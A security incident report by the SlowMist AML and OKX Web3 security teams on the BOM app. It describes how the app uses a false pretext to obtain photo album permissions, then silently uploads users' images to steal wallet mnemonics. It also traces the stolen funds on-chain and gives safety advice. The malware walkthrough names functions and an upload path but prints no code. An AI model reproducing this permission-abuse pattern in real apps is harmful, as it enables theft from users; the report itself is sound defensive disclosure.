On February 14, 2025, many users reported that their wallet assets were stolen. After on-chain data analysis, the theft cases all met the characteristics of mnemonic/private key leakage. After further revisiting the victim users, it was found that most of them had installed and used an application called BOM. In-depth investigations showed that the application was actually a carefully disguised fraud software. After the criminals induced users to authorize through the software, they illegally obtained mnemonic/private key permissions, and then implemented systematic asset transfers and concealment. Therefore, the SlowMist AML team and the OKX Web3 security team investigated and disclosed the modus operandi of the malware, and conducted on-chain tracking analysis, hoping to provide more users with security warnings and suggestions.

1. Malware Analysis (OKX)

With the user's consent, the OKX Web3 security team collected the apk files of the BOM application on some users' phones for analysis. The details are as follows:

1. Conclusion

1. After entering the contract page, the malicious app deceives users into authorizing local file and album permissions on the grounds that they are required for the operation of the application.
2. After obtaining user authorization, the app scans and collects media files in the device's photo album in the background, packages them and uploads them to the server. If the user's files or photo albums contain information related to mnemonics and private keys, criminals may use the relevant information collected by the app to steal the user's wallet assets.

2. Analysis process

1. Preliminary analysis of samples

1) Application signature analysis

The signature subject is not standardized. After parsing, it is adminwkhvjv, which is a bunch of meaningless random characters. Normal applications generally use a meaningful combination of letters.

2) Malicious permissions analysis

In the AndroidManifest file of the app, we can see that a large number of permissions are registered, including some information-sensitive permissions, including reading and writing local files, reading media files, and photo albums.

2. Dynamic Analysis

Since the app backend interface service was offline during the analysis, the app could not run normally and dynamic analysis could not be performed for the time being.

3. Decompilation analysis

After decompilation, we found that the number of classes in the dex of this application was very small, and we performed static analysis on these classes at the code level.

Its main logic is to decrypt some files and load the application:

The product files of uniapp are found in the assets directory, indicating that the app was developed using the cross-platform framework uniapp:

The main logic of the application developed under the uniapp framework is in the product file app-service.js. Some key codes are encrypted in app-confusion.js. We mainly start the analysis from app-service.js.

1) Trigger entry

At the entrance of each registration page, I found the entrance called contract page

The corresponding function index is 6596

2) Initialization reporting of device information

The callback onLoad() after the contract page is loaded will call doContract()

initUploadData() is called in doContract()

In initUploadData(), the network status will be checked first, and the image and video lists will also be checked to see if they are empty. Finally, the callback e() will be called.

The callback e() is getAllAndIOS().

3) Check and request permissions

Here, in iOS, permissions will be requested first, and the user will be deceived into agreeing with the copy that the application needs to run normally. The request for authorization here is quite suspicious. As a blockchain-related application, its normal operation has no necessary connection with the permissions of the photo album. This request obviously exceeds the normal requirements for the operation of the application.

On Android, also determine and apply for photo album permissions first.

4) Collect and read album files

Then read the pictures and videos in androidDoingUp and package them.

5) Upload album files

Finally, upload is performed in uploadBinFa(), uploadZipBinFa() and uploadDigui(). You can see that the uploaded interface path is also a random string of characters.

The iOS process is similar. After obtaining the permission, iOS starts collecting uploaded content through getScreeshotAndShouchang().

6) Upload interface

The commonUrl domain name in the reported URL comes from the return of the /api/bf9023/c99so interface.

The domain of this interface comes from the local cache of uniapp.

The code written to the cache was not found. It may be encrypted and obfuscated and exists in app-confusion.js. The domain was seen in the application cache during a historical run.

2. On-chain Funding Analysis (SlowMist)

According to the analysis of MistTrack, an on-chain tracking and anti-money laundering tool under SlowMist AML, the current main coin theft address (0x49aDd3E8329f2A2f507238b0A684d03EAE205aab) has stolen funds from at least 13,000 users and made a profit of more than 1.82 million US dollars.

(https://dune.com/queries/4721460)

The first transaction of the address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab occurred on February 12, 2025, and 0.001 BNB was transferred from the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35 as the initial capital:

Analyzing the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35, the first transaction of this address also appeared on February 12, 2025. Its initial funds came from the address 0x71552085c854EeF431EE55Da5B024F9d845EC976 marked as "Theft-Stolen Private Key" by MistTrack:

Continue to analyze the funds flow of the initial hacker address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab:

BSC: Profit of about $37,000, including USDC, USDT, WBTC and other currencies, often using PancakeSwap to exchange some tokens for BNB:

The current address balance is 611 BNB and tokens worth approximately $120,000, such as USDT, DOGE, and FIL.

Ethereum: Profit of about $280,000, most of which came from ETH transferred from other chains. Then 100 ETH was transferred to 0x7438666a4f60c4eedc471fa679a43d8660b856e0. This address also received 160 ETH transferred from the above address 0x71552085c854EeF431EE55Da5B024F9d845EC976. A total of 260 ETH has not been transferred out yet.

Polygon: Profit of about 37,000 or 65,000 US dollars, including WBTC, SAND, STG and other currencies. Most of the tokens have been exchanged for 66,986 POL through OKX-DEX. The current balance of the hacker address is as follows:

Arbitrum: Profit of about $37,000, including USDC, USDT, WBTC and other currencies, tokens converted to ETH, a total of 14 ETH cross-chain to Ethereum through OKX-DEX:

Base: Profit of about $12,000, including FLOCK, USDT, MOLLY and other currencies, tokens converted to ETH, a total of 4.5 ETH cross-chain to Ethereum through OKX-DEX:

The remaining chains will not be described in detail. We also made a brief analysis of another hacker address provided by the victim.

The first transaction of the hacker address 0xcb6573E878d1510212e84a85D4f93Fd5494f6EA0 appeared on February 13, 2025, with a profit of about 650,000 US dollars, involving multiple chains, and the relevant USDT was cross-chain to the TRON address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx:

The address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx received a total of 703,119.2422 USDT, with a balance of 288,169.2422 USDT, of which 83,000 USDT was transferred to the address TZJiMbiqBBxDXhZXbrtyTYZjVDA2jd4eus and was not transferred out, and the remaining 331,950 USDT was transferred to the address THKqT6PybrzcxkpFBGSPyE11kemRNRmDDz that had interacted with Huionepay.

We will continue to monitor the relevant balance addresses.

3. Safety Recommendations

To help users improve their protection awareness, the SlowMist AML team and the OKX Web3 security team have compiled the following security recommendations:

1. Never download software from unknown sources (including so-called "wool-pulling tools" and any software from unknown publishers).
2. Never trust software download links recommended by friends or in communities; always download through official channels.
3. Download and install apps from regular channels, including Google Play, App Store, and major official app stores.
4. Keep the mnemonics properly and do not save them by taking screenshots, taking photos, saving them in a notepad, or using a cloud disk. The OKX mobile wallet has prohibited screenshots of the private key and mnemonics pages.
5. Use physical methods to save mnemonics, such as copying them on paper, saving them in hardware wallets, segmented storage (split the mnemonics/private keys and store them in different locations), etc.
6. Changing your wallet regularly can help eliminate potential security risks.
7. With the help of professional on-chain tracking tools such as MistTrack (https://misttrack.io/), funds can be monitored and analyzed to reduce the risk of fraud or phishing incidents and better protect asset security.
8. It is highly recommended to read "Blockchain Dark Forest Self-Rescue Manual" written by Yu Xian, the founder of SlowMist.